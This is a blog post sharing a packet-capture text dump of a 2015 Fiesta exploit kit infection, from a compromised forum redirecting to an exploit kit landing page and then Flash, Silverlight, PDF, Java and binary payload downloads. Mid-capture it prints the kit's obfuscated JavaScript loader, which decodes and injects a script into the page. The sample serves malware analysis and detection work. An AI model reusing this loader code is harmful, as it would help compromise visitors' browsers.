Fiesta-EK Exploit Kit Trying Shockwave Flash Silverlight Java PCAP Traffic Sample

By | June 22, 2015

2015-02-05 12:33:52.634092 IP 192.168.221.134.49257 > 38.113.120.12.80: Flags [P.], seq 1:669, ack 1, win 64240, length 668
E…..@………&qx..i.P…… .P…r…GET / HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.google.co.uk/url?url=http://www.droidrzr[.]com/&rct=j&frm=1&q=&esrc=s&sa=U&ei=Z5vTVK2NIOes7Abi0oHYBg&ved=0CBUQFjAA&usg=AFQjCNE797nP9xKz4E4-jpH9Rk-HR_8-Bg
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.droidrzr[.]com
Connection: Keep-Alive
2015-02-05 12:33:52.634227 IP 38.113.120.12.80 > 192.168.221.134.49257: Flags [.], ack 669, win 64240, length 0
E..(……*N&qx……P.i.. ….*P….l……..
2015-02-05 12:34:01.745868 IP 38.113.120.12.80 > 192.168.221.134.49257: Flags [P.], seq 1:1356, ack 669, win 64240, length 1355
E..s……”.&qx……P.i.. ….*P….m..HTTP/1.1 200 OK
Date: Thu, 05 Feb 2015 16:27:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.22
Set-Cookie: session_id=52761f4298b0b1d291eff75706cf9c66; path=/; httponly
Cache-Control: no-cache, must-revalidate, max-age=0
Expires: Wed, 04 Feb 2015 16:27:48 GMT
Pragma: no-cache
Content-Encoding: gzip
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html;charset=UTF-8

5bf2
…………kS.I.0…x.C.f..}…..0…….|.3ATwWK.}.. d.#..p>…~}…KNfVw.%.M..]…R..*+++.U…..6…….c.=}…e6w..%…=…..<wD..>.A(…..W.n……l..”.,c.[P.=g..7…..~…..g….{.[…^…../{p.Q.m..\K..yMB..>.”.”…………..<.4[…..pa^./W…..l.=f..WK…”=…mKl..s..}..j…j….}..’..
….d9./..@…?.lK…….VX3xp|..(.A..%.W}…….G,..b…..v.O.|Z….._..|.~…|{r…Z..O.LYa….8..#.`.0.@.7..ru;6D..Q..^l..o..<\…….*..hAY..^X!……S.._…….zC…….”.E..^l….}3……4..lP.].|Op….
>;..4.;.9.8..m……W.m…j..Ih.I….O.9.s..O.h.W*….$.K..=.K….W.0…..XnT.._.d….Y.!N……….n…4:….Z.>u..l.z..
S{….\. ..!9l.k..!b.
…k.s[.@n…..]..;…..L…1….(..Q.0……_*.?,…`./Y.W..(‘..Z…[N._../]..3’`..<.G.”…RY…K.R……&.bW.n………8Zf.u*…C.
w..a…..2..2…..S….)x…r.UM..y..C..V.NUE.;..r|`v..&.._O’.Ki………..zd.|. ..v\..n}}}…A…i
2015-02-05 12:34:01.849180 IP 38.113.120.12.80 > 192.168.221.134.49257: Flags [P.], seq 1:1356, ack 669, win 64240, length 1355
E..s……”.&qx……P.i.. ….*P….m..HTTP/1.1 200 OK
Date: Thu, 05 Feb 2015 16:27:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.22
Set-Cookie: session_id=52761f4298b0b1d291eff75706cf9c66; path=/; httponly
Cache-Control: no-cache, must-revalidate, max-age=0
Expires: Wed, 04 Feb 2015 16:27:48 GMT
Pragma: no-cache
Content-Encoding: gzip
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html;charset=UTF-8

5bf2
2015-02-05 12:34:02.896896 IP 192.168.221.134.49262 > 136.243.224.9.80: Flags [P.], seq 1:465, ack 1, win 64240, length 464
E…..@………… .n.P.j.`..YRP…….GET /rIu-hMGZHkJUT/YMxgGj-wNK_WpIOHJhik/kOpTWt/XTZ–r-GoU–H_wKtgzNO-.php?_-F8vzUE=-203Y5dv5&WZRk=0qbp0k1Yqee&fd=f-L01w89n4&8=aq3 HTTP/1.1
Accept: */*
Referer: http://www.droidrzr[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: iopsctlvzs[.]com
Connection: Keep-Alive
2015-02-05 12:34:03.707250 IP 136.243.224.9.80 > 192.168.221.134.49262: Flags [P.], seq 1:1410, ack 465, win 64240, length 1409
E………Wg… …..P.n..YR.j.0P….V..HTTP/1.1 200 OK
Date: Thu, 05 Feb 2015 16:34:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.29
Pragma: no-cache, no-store
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 1125
Connection: close
Content-Type: text/javascript
X-Pad: avoid browser bug
2015-02-05 12:34:04.559056 IP 192.168.221.134.49257 > 38.113.120.12.80: Flags [P.], seq 669:1114, ack 24019, win 64240, length 445
E…..@………&qx..i.P…*..~.P…h…GET /public/style_images/dark_matter/useropts_arrow.png HTTP/1.1
Accept: */*
Referer: http://www.droidrzr[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.droidrzr[.]com
Connection: Keep-Alive
Cookie: session_id=52761f4298b0b1d291eff75706cf9c66
2015-02-05 12:34:04.559227 IP 38.113.120.12.80 > 192.168.221.134.49257: Flags [.], ack 1114, win 64240, length 0
E..(.7….&.&qx……P.i..~…..P………….
2015-02-05 12:34:04.888803 IP 38.113.120.12.80 > 192.168.221.134.49257: Flags [P.], seq 24019:24512, ack 1114, win 64240, length 493
E….t….$.&qx……P.i..~…..P…….HTTP/1.1 200 OK
Date: Thu, 05 Feb 2015 16:27:59 GMT
Server: Apache/2
Last-Modified: Tue, 25 Dec 2012 20:11:00 GMT
ETag: “43810f-d9-4d1b2e993bd00”
Accept-Ranges: bytes
Content-Length: 217
Keep-Alive: timeout=2, max=99
Connection: Keep-Alive
Content-Type: image/png

.PNG
2015-02-05 12:34:04.891235 IP 192.168.221.134.49257 > 38.113.120.12.80: Flags [P.], seq 1114:1561, ack 24512, win 63747, length 447
E…..@…._….&qx..i.P……..P…….GET /uploads/profile/photo-thumb-50903.jpeg?_r=1420221854 HTTP/1.1
Accept: */*
Referer: http://www.droidrzr[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.droidrzr[.]com
Connection: Keep-Alive
Cookie: session_id=52761f4298b0b1d291eff75706cf9c66
2015-02-05 12:34:04.891244 IP 38.113.120.12.80 > 192.168.221.134.49257: Flags [.], ack 1561, win 64240, length 0
E..(.v….&.&qx……P.i……..P….0……..
2015-02-05 12:34:05.293515 IP 38.113.120.12.80 > 192.168.221.134.49257: Flags [P.], seq 24512:25867, ack 1561, win 64240, length 1355
E..s…… .&qx……P.i……..P…41..HTTP/1.1 200 OK
Date: Thu, 05 Feb 2015 16:27:59 GMT
Server: Apache/2
Last-Modified: Fri, 02 Jan 2015 18:04:14 GMT
ETag: “2788bac-8c0-50baf2b1c2380”
Accept-Ranges: bytes
Content-Length: 2240
Keep-Alive: timeout=2, max=98
Connection: Keep-Alive
Content-Type: image/jpeg

……JFIF………….;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75
…C……….. .
……………….. $.’ “,#..(7),01444.’9=82<.342…C. …….2!.!22222222222222222222222222222222222222222222222222……d.d..”……………………………….
…………………}……..!1A..Qa.”q.2….#B…R..$3br.
…..%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz………………………………………………………………………………………….
…………………w…….!1..AQ.aq.”2…B…. #3R..br.
.$4.%…..&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz…………………………………………………………………………?…(4U.)U..*)bz.Vmm._.y.Qt..~….6…6>..S.s.U.)..C}.1.W….{.|.:.4U
..’……O.R..=.}..V4../%x.T………*..D…^M.g…H.w.j..U.c*.A.6…..^.K..H…?#…..n.q.BG..CD.$..sj..*U…
.dr+jK.;..<EO…=q….+6h~….^3..QX.)l.h.r..a..De…..U.F.QE .. =(.4.F. .u…((\.=h.E-..kNs….hg
…..z.0….LM]X..d…7nT..n:~y…….]…g.f.c.&.&(+E!1K.x4b.Sq..F..:…..om…….G…2.R*….&.~.7G…]…S*.W
2015-02-05 12:34:05.294177 IP 38.113.120.12.80 > 192.168.221.134.49257: Flags [P.], seq 25867:27032, ack 1561, win 64240, length 1165
E………!.&qx……P.i……..P…d-..R.T….q;………QI.-(.IZ6q.=. .e.<v..#Z4.Yr…@R….d.hqn.Hw..9….\hL…E…….}.x….V.7,v2….I….6=M2…]…..F6..<.sU…. ..z3…E.X*…..:+M… r.>d.>U^p…..A.Z……Q….)..l.)….z..{V…2..+…Ek.q{mk)..*….SV34.R;+s…w..b..|D……….P].a…]C…………..P………TEes~^k{\&z’
>..Uj-B..g..B….s……IK….?.{…..9……..h…}..?…..g<.|
..NI<..<.S.
C$..O..+..lm*-.OM.3.x……3…a.’..
……….’p/..V……!Bx8…..rI.&……..l.t’6. .&#…..7…`………….H..W.H<.Pd.&…T…\.d_..o……T..F)4…To.A._.Q..<.T….:]:eM:.z…..^/*4?v0……..h..p….[……kJ…..9…..^..pT.a..1C4].
.%tz^…{………*.T.x… …….m..iKaim5…v.L..d .P……~…….aS……….{g5J*….C.S
5;……Uk..n./mvb..n^m…1.?L.C..@….GE..7.. X.w…..J>…Tm-.JJ….._n.~…2p..\..j..q.7K.M.y.
;……4.|…..R[….2va..L.M..+.G(…….V.
……….*.)SH…….b..0]…T……..N.N.C……_s.S……..W..s……..U…%.-….p..}.Y…jP.t.o.g.V.:…..u…….G<[..o….V………Q..V…..p?.1….’.O..6.J.B.’..I.C%..#…..R……$.5. ..X.KI…7.1N…..+.’……Vg…g…^?…,.NA……..SD…NZ.bi(..aE.P+.0…a…P.QE….#.h………bAE.PPR.E.&h…..
2015-02-05 12:34:05.295163 IP 192.168.221.134.49257 > 38.113.120.12.80: Flags [.], ack 27032, win 64240, length 0
E..(.:@………&qx..i.P…….XP….X……..
2015-02-05 12:34:05.297778 IP 192.168.221.134.49257 > 38.113.120.12.80: Flags [P.], seq 1561:1997, ack 27032, win 64240, length 436
E….<@….3….&qx..i.P…….XP….`..GET /public/style_extra/sharelinks/twitter.png HTTP/1.1
Accept: */*
Referer: http://www.droidrzr[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.droidrzr[.]com
Connection: Keep-Alive
Cookie: session_id=52761f4298b0b1d291eff75706cf9c66
2015-02-05 12:34:05.689313 IP 38.113.120.12.80 > 192.168.221.134.49257: Flags [P.], seq 27032:27884, ack 1997, win 64240, length 852
E..|.r….”]&qx……P.i…X…ZP…-,..HTTP/1.1 200 OK
Date: Thu, 05 Feb 2015 16:27:59 GMT
Server: Apache/2
Last-Modified: Sun, 14 Apr 2013 21:06:19 GMT
ETag: “3a8224-23f-4da5881f2e8c0″
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=2, max=97
Connection: Keep-Alive
Content-Type: image/png

.PNG
.
….IHDR…………….a… pHYs………..~…..IDAT8…MOSQ.@.}………..,\. $..u..-..41&…n..&.Z5…H.].j$AlJiKix.c\.g.T..M2s…\U.;…U.gTQ).;”-….t.\U..*>,xrZ..”@.(.GA..OE.Z..oz..#!w&……c…e..$..<….W+..0.=..c=..z.).akY(MG.i.G.-kY..8 ….F.. .\..(.5….\…..Ep^.~.P.O.f…..v…8/x…p…..{;…%.F~…’8. h..D…b<….jR.D…x.+… X2….=^@;…/…?P..1.kw1″…. F…e!..y&H,..’……j.i….z.X.x6.9.?….gLW8…….._.l}….<hR….L.T.Riu…A.y.Csl.!…….i.9.C..z….r…….,.e.;.1…Od.;.3..=..!.}W…..{R…+….k~.b,..\..~..m”2;`’L….IEND.B`.
2015-02-05 12:34:05.709440 IP 192.168.221.134.49257 > 38.113.120.12.80: Flags [P.], seq 1997:2443, ack 27884, win 63388, length 446
E….s@………&qx..i.P…Z….P…O…GET /uploads/profile/photo-thumb-41248.png?_r=1393899418 HTTP/1.1
Accept: */*
Referer: http://www.droidrzr[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.droidrzr[.]com
Connection: Keep-Alive
Cookie: session_id=52761f4298b0b1d291eff75706cf9c66
2015-02-05 12:34:05.709538 IP 38.113.120.12.80 > 192.168.221.134.49257: Flags [.], ack 2443, win 64240, length 0
E..(.y….%.&qx……P.i……..P………….
2015-02-05 12:34:06.022982 IP 38.113.120.12.80 > 192.168.221.134.49257: Flags [P.], seq 27884:29239, ack 2443, win 64240, length 1355
E..s……..&qx……P.i……..P…x…HTTP/1.1 200 OK
Date: Thu, 05 Feb 2015 16:28:00 GMT
Server: Apache/2
Last-Modified: Tue, 04 Mar 2014 02:16:58 GMT
ETag: “2788ab9-472e-4f3be7fa99a80”
Accept-Ranges: bytes
Content-Length: 18222
Keep-Alive: timeout=2, max=96
Connection: Keep-Alive
Content-Type: image/png

.PNG
2015-02-05 12:34:06.738948 IP 192.168.221.134.49257 > 38.113.120.12.80: Flags [P.], seq 2443:2918, ack 46387, win 63352, length 475
E….1@………&qx..i.P……..P..x/z..GET /public/style_extra/sharelinks/print.png HTTP/1.1
Accept: */*
Referer: http://www.droidrzr[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.droidrzr[.]com
Connection: Keep-Alive
Cookie: session_id=52761f4298b0b1d291eff75706cf9c66; _ga=GA1.2.1344201475.1423154045; _gat=1
2015-02-05 12:34:06.739041 IP 38.113.120.12.80 > 192.168.221.134.49257: Flags [.], ack 2918, win 64240, length 0
E..(……$
&qx……P.i……..P…Gp……..
2015-02-05 12:34:07.090634 IP 38.113.120.12.80 > 192.168.221.134.49257: Flags [P.], seq 46387:47073, ack 2918, win 64240, length 686
E……… .&qx……P.i……..P…….HTTP/1.1 200 OK
Date: Thu, 05 Feb 2015 16:28:01 GMT
Server: Apache/2
Last-Modified: Sun, 14 Apr 2013 21:06:18 GMT
ETag: “3a8220-199-4da5881e3a680″
Accept-Ranges: bytes
Content-Length: 409
Keep-Alive: timeout=2, max=95
Connection: Keep-Alive
Content-Type: image/png

.PNG
2015-02-05 12:34:15.061322 IP 192.168.221.134.49329 > 205.234.186.113.80: Flags [P.], seq 1:558, ack 1, win 64240, length 557
E..U
q@…………q…P*!…..$P…$…GET /v3_g1okw/kSoNIfMf-YApwN_B7NtP HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.droidrzr[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: onlovemusic[.[in
Connection: Keep-Alive
2015-02-05 12:34:15.061505 IP 205.234.186.113.80 > 192.168.221.134.49329: Flags [.], ack 558, win 64240, length 0
E..(……4C…q…..P…..$*!..P….v……..
2015-02-05 12:34:15.601368 IP 205.234.186.113.80 > 192.168.221.134.49329: Flags [P.], seq 1:1356, ack 558, win 64240, length 1355
E..s. ………q…..P…..$*!..P…%…HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Thu, 05 Feb 2015 16:36:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 05 Feb 2015 16:36:45 GMT
Pragma: no-cache
Crags and i marvel; for thither had worn, and secreted, but lure. Nimbler boat must cord dismissd, that usury offends celestial dame . Dim i descended thus ruin . Power, no more proud one the wind is my going. By; and marvel; for my secreted, but nimbler. Cord that holds them horrible dispraise! i my whelps, that . Dim i spake: o ruin ye have. Power, no proud alp, and by; and bruges, to mind. Marvel; for secreted, but silence. Nimbler boat must we from. Dim i questiond: shall live the ruin ye aware, down power . Proud scorn, but thorns confine on me! cried by; and vast . Marvel; for secreted, but nimbler boat must. Cord dismissd, that markd and on his have thee charon complain . Dim i arrive, a ruin ye citizens. Power, and proud honour to by; and marvel; for every. Secreted, but those sages tell . Cord that dim i spied . Power, no ill proud tyrants bosoms. By; and hisses with him, as marvel . Nimbler boat must lead, whom there. Dim i keep my purse i ruin ye beneath, where power. Proud scorn, and entring joind pen
2015-02-05 12:34:15.604277 IP 205.234.186.113.80 > 192.168.221.134.49329: Flags [P.], seq 1356:2711, ack 558, win 64240, length 1355

2015-02-05 12:34:17.115843 IP 192.168.221.134.49330 > 205.234.186.113.80: Flags [P.], seq 1:481, ack 1, win 64240, length 480
E…
.@…………q…P..”….yP….n..GET /v3_g1okw/338d1c711e98f992070a0f5f03580605060a0b5f0501070a06075c5708000655;118800;94 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://onlovemusic[.[in/v3_g1okw/kSoNIfMf-YApwN_B7NtP
x-flash-version: 11,8,800,94
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: onlovemusic[.[in
Connection: Keep-Alive
2015-02-05 12:34:17.115861 IP 205.234.186.113.80 > 192.168.221.134.49330: Flags [.], ack 481, win 64240, length 0
E..(……3….q…..P…..y..$lP…_………
2015-02-05 12:34:17.245921 IP 205.234.186.113.80 > 192.168.221.134.49331: Flags [S.], seq 2332289060, ack 3526089646, win 64240, options [mss 1460], length 0
E..,……3….q…..P…..$.+..`………….
2015-02-05 12:34:17.246811 IP 192.168.221.134.49331 > 205.234.186.113.80: Flags [.], ack 1, win 64240, length 0
E..(
.@…………q…P.+…..%P….P……..
2015-02-05 12:34:17.248864 IP 192.168.221.134.49331 > 205.234.186.113.80: Flags [P.], seq 1:629, ack 1, win 64240, length 628
E…
.@….J…….q…P.+…..%P…C…GET /v3_g1okw/21c08ad39ade24d35b540f0b0a5a55070708500b0c0354080705070301025557 HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://onlovemusic[.[in/v3_g1okw/kSoNIfMf-YApwN_B7NtP
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: onlovemusic[.[in
Connection: Keep-Alive
2015-02-05 12:34:17.248943 IP 205.234.186.113.80 > 192.168.221.134.49331: Flags [.], ack 629, win 64240, length 0
E..(……3….q…..P…..%.+.”P………….
2015-02-05 12:34:17.413809 IP 205.234.186.113.80 > 192.168.221.134.49330: Flags [.], seq 1:1461, ack 481, win 64240, length 1460
E………-….q…..P…..y..$lP…[…HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Thu, 05 Feb 2015 16:36:47 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 10212
Connection: close
Last-Modified: Thu, 05 Feb 2015 16:36:47 GMT
Content-Disposition: inline; filename=jsoxmnrd274.swf
2015-02-05 12:34:17.751218 IP 192.168.221.134.49332 > 205.234.186.113.80: Flags [P.], seq 1:363, ack 1, win 64240, length 362
E…
.@….L…….q…PF.M…%HP…l…GET /v3_g1okw/20a3d74e4bada76c415c1708560c0551070952085055045e070405005d540501;4060531 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: onlovemusic[.[in
Connection: Keep-Alive

2015-02-05 12:34:18.088799 IP 192.168.221.134.49333 > 205.234.186.113.80: Flags [P.], seq 1:384, ack 1, win 64240, length 383
E…
.@…………q…P.2N..ym.P….X..GET /v3_g1okw/6da72b68b9aa419e5a0d030c0059070c035d520c06000603035005040b01075c;910 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: onlovemusic[.[in
Connection: Keep-Alive
Cache-Control: no-cache
2015-02-05 12:34:18.088901 IP 205.234.186.113.80 > 192.168.221.134.49333: Flags [.], ack 384, win 64240, length 0
E..(……3^…q…..P…ym..2P&P…N………
2015-02-05 12:34:18.124381 IP 205.234.186.113.80 > 192.168.221.134.49331: Flags [.], seq 12196:13656, ack 629, win 64240, length 1460
E………-….q…..P…….+.”P…….Y39eCi5fAYgF_P9eyj9e3PReADgmof7X1f8qrI5ZaJLXbs5lJJ2lnJTluJ7jB02fx0gWAg5UhSrFSzxK1DgwnP9fyD9eADAKdDgKkPxOowrFDqyj3sxqDBxUuJemYzgFUv5qYagK_SrfyarUuJee1jreA15EYSrwkP9fA0gq6ogfxDrlbi2ZDsxFUZxX1G8qD3gqJi7Xuf9KdB7O3sxEDDrOo08fyDxWkjgwhs</div></body>
<script>
function gena6v(jt,vi,qwi){var yj,sbn,i5,dh,p5u;dh=”;i5=0;yj=0;p5u=’char’;while(yj<jt.length){i5=i5+vi;sbn=qwi[.[indexOf(gaudbv(jt,yj,p5u));sbn=(sbn+i5)%qwi.length;dh+=gaudbv(qwi,sbn,p5u);yj++}return dh}function hogsa(lan){var n3o,s4,uo2,ah8;uo2=”;ah8=0;while(ah8<lan.length){s4=lan.substr(ah8,2);n3o=bombtt(s4);uo2=uo2+String.fromCharCode(n3o);ah8+=2}return uo2}blobk=’DL6aBZ-Aeu3W4CigX=17ml5dzJFnP+pEfKR80qQ2N9jvckUb’;function rigs1m(f5k,nx){return hogsa(gena6v(f5k,nx,blobk))}function bombtt(tzg){var ci,lk;lk=16;ci=parseInt(tzg,lk);return ci}function gaudbv(k8f,o1,cto){return k8f[cto+’At’](o1)}cree9=’bMOlNUFWVy7-TC8LnAmX_kKe9rRg5x2QoaZz3DEwi0cHBuPIJdjvh1qf6YGs4Stp’;function wats72(rbp,fu){(window[rbp])(fu)}function stano(msy,u4t){var jsi,os,yw4;yw4=rigs1m(‘kXfNe5uPCWD=B0ea’,22);os=’length’;jsi=msy[yw4](16);while(jsi[os]<u4t){jsi=’0’+jsi}return jsi}function defyyc(sod){var pg,n7e,jc,tt;jc=’length’;n7e=”;pg=0;while(pg<sod[jc]){tt=moanbb(sod,pg);n7e+=stano(tt,6);pg+=4}return hogsa(n7e)}function foote(xcy,l3){xcy[l3]=jetsz(deus8(),’hilly’)}function jetsz(gg,wv){var u9,mlr,ni1;u9=rigs1m(‘F9FeFeF5v208U40d0c’,24);mlr=gg[‘getElementById’](wv);ni1=mlr[u9];return defyyc(ni1)}function deus8(){retur
2015-02-05 12:34:18.124400 IP 205.234.186.113.80 > 192.168.221.134.49331: Flags [FP.], seq 13656:14154, ack 629, win 64240, length 498
E………1d…q…..P…..|.+.”P…….n window[‘docume’+’nt’]}function bunk3(){return ‘body’}function tofumz(){var ky,y5z,aom,x5o,s9t;x5o=deus8();y5z=x5o[‘createElement’](‘script’);s9t=bunk3();try{x5o[s9t]++}catch(exc){ky=’append’;ky+=’Child’;aom=jetsz(x5o,’floetg’);foote(y5z,’text’);x5o[s9t][ky](y5z);wats72(‘owed0′,aom)}}function moanbb(u4p,kl5){var vbh,pqn,x9,l25;x9=0;l25=0;while(l25<4){pqn=gaudbv(u4p,kl5+l25,’char’);vbh=cree9[‘index’+’Of’](pqn);vbh=vbh&0x3f;x9|=vbh<<(3-l25)*6;l25++}return x9}tofumz();
</script>
</html>
0
2015-02-05 12:34:18.125312 IP 205.234.186.113.80 > 192.168.221.134.49332: Flags [.], seq 1:1461, ack 363, win 64240, length 1460
E………-….q…..P….%HF.O.P…uv..HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Thu, 05 Feb 2015 16:36:48 GMT
Content-Type: application/x-silverlight-app
Content-Length: 10499
Connection: close
Last-Modified: Thu, 05 Feb 2015 16:36:48 GMT
Content-Disposition: inline; filename=pevgbifk406.xap
2015-02-05 12:34:18.401079 IP 205.234.186.113.80 > 192.168.221.134.49333: Flags [.], seq 1:1461, ack 384, win 64240, length 1460
E………-….q…..P…ym..2P&P…….HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Thu, 05 Feb 2015 16:36:48 GMT
Content-Type: application/pdf
Content-Length: 8301
Connection: close
Content-Disposition: inline; filename=pjbzaek385.pdf

%PDF-1.6
2015-02-05 12:34:19.030299 IP 205.234.186.113.80 > 192.168.221.134.49334: Flags [.], seq 1:1461, ack 357, win 64240, length 1460
E….=….-S…q…..P…..N;…P….g..HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Thu, 05 Feb 2015 16:36:49 GMT
Content-Type: application/octet-stream
Content-Length: 139562
Connection: close

2015-02-05 12:34:49.502073 IP 192.168.221.134.49346 > 205.234.186.113.80: Flags [P.], seq 1:261, ack 1, win 64240, length 260
E..,..@….f…….q…P…….yP…vK..GET /v3_g1okw/73aa93f6a567188f544b045a0b085702020a525a0d51560d0207055200505752;1;3;1 HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_06
Host: onlovemusic[.[in
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
2015-02-05 12:34:49.502147 IP 205.234.186.113.80 > 192.168.221.134.49346: Flags [.], ack 261, win 64240, length 0
E..(……)….q…..P…..y….P….l……..
2015-02-05 12:34:49.878345 IP 205.234.186.113.80 > 192.168.221.134.49346: Flags [FP.], seq 1:155, ack 261, win 64240, length 154
E………)….q…..P…..y….P….y..HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Thu, 05 Feb 2015 16:37:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close

Share Button

One thought on “Fiesta-EK Exploit Kit Trying Shockwave Flash Silverlight Java PCAP Traffic Sample

  1. Pingback: Joseph de Saram#Rhodium

Leave a Reply

Your email address will not be published. Required fields are marked *